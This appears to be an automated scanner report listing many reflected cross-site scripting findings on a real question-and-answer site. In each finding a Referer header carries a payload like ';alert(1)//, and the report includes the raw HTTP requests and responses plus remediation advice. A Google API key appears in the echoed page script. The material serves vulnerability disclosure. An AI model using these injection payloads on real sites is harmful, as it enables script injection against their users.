<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "e2434";alert(1)//40b9502e47"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80de'%3balert(1)//2bbe976dfa9 was submitted in the Referer HTTP header. This input was echoed as d80de';alert(1)//2bbe976dfa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d80de'%3balert(1)//2bbe976dfa9
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 35111
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58da2'%3balert(1)//bbd7524fdca was submitted in the Referer HTTP header. This input was echoed as 58da2';alert(1)//bbd7524fdca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/how-are-mortgage-properties-registered.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=58da2'%3balert(1)//bbd7524fdca
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:17 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:17 GMT Connection: close Content-Length: 30482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd6c"%3balert(1)//f1f27091f7b was submitted in the Referer HTTP header. This input was echoed as bcd6c";alert(1)//f1f27091f7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/how-are-mortgage-properties-registered.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bcd6c"%3balert(1)//f1f27091f7b
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:16 GMT Connection: close Content-Length: 30482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "bcd6c";alert(1)//f1f27091f7b"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc6b'%3balert(1)//1fcabebdc24 was submitted in the Referer HTTP header. This input was echoed as fdc6b';alert(1)//1fcabebdc24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fdc6b'%3balert(1)//1fcabebdc24
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:13 GMT Connection: close Content-Length: 29547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f3f"%3balert(1)//41fc69da3be was submitted in the Referer HTTP header. This input was echoed as 25f3f";alert(1)//41fc69da3be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=25f3f"%3balert(1)//41fc69da3be
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:13 GMT Connection: close Content-Length: 29547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "25f3f";alert(1)//41fc69da3be"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc8e'%3balert(1)//6bb3a5f1c5f was submitted in the Referer HTTP header. This input was echoed as ccc8e';alert(1)//6bb3a5f1c5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-checking-account-limit.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ccc8e'%3balert(1)//6bb3a5f1c5f
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:14 GMT Connection: close Content-Length: 33335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1947f"%3balert(1)//760c35e1ead was submitted in the Referer HTTP header. This input was echoed as 1947f";alert(1)//760c35e1ead in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-checking-account-limit.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1947f"%3balert(1)//760c35e1ead
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:14 GMT Connection: close Content-Length: 33335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "1947f";alert(1)//760c35e1ead"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50b1'%3balert(1)//6a7613daa75 was submitted in the Referer HTTP header. This input was echoed as a50b1';alert(1)//6a7613daa75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a50b1'%3balert(1)//6a7613daa75
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:16 GMT Connection: close Content-Length: 31563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5395"%3balert(1)//8cf555a3bfa was submitted in the Referer HTTP header. This input was echoed as d5395";alert(1)//8cf555a3bfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d5395"%3balert(1)//8cf555a3bfa
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:16 GMT Connection: close Content-Length: 31563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d5395";alert(1)//8cf555a3bfa"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a44e'%3balert(1)//5f700a46bff was submitted in the Referer HTTP header. This input was echoed as 1a44e';alert(1)//5f700a46bff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage-lender.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1a44e'%3balert(1)//5f700a46bff
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:58 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:35:57 GMT Connection: close Content-Length: 34659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacf1"%3balert(1)//155dee88ae4 was submitted in the Referer HTTP header. This input was echoed as dacf1";alert(1)//155dee88ae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage-lender.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=dacf1"%3balert(1)//155dee88ae4
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:57 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:35:56 GMT Connection: close Content-Length: 34659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "dacf1";alert(1)//155dee88ae4"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ffb'%3balert(1)//2017b493094 was submitted in the Referer HTTP header. This input was echoed as c2ffb';alert(1)//2017b493094 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c2ffb'%3balert(1)//2017b493094
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 85378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6163"%3balert(1)//498765472fb was submitted in the Referer HTTP header. This input was echoed as d6163";alert(1)//498765472fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d6163"%3balert(1)//498765472fb
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 85378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d6163";alert(1)//498765472fb"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0800"%3balert(1)//0d9e6834871 was submitted in the Referer HTTP header. This input was echoed as d0800";alert(1)//0d9e6834871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-an-online-checking-account.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d0800"%3balert(1)//0d9e6834871
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:13 GMT Connection: close Content-Length: 33683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d0800";alert(1)//0d9e6834871"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaeae'%3balert(1)//9e376e61a79 was submitted in the Referer HTTP header. This input was echoed as aaeae';alert(1)//9e376e61a79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-an-online-checking-account.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aaeae'%3balert(1)//9e376e61a79
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:14 GMT Connection: close Content-Length: 33683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11ee8"%3balert(1)//0fd04f86b98 was submitted in the Referer HTTP header. This input was echoed as 11ee8";alert(1)//0fd04f86b98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=11ee8"%3balert(1)//0fd04f86b98
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 46266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "11ee8";alert(1)//0fd04f86b98"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c11'%3balert(1)//0c64a2d8a24 was submitted in the Referer HTTP header. This input was echoed as 71c11';alert(1)//0c64a2d8a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
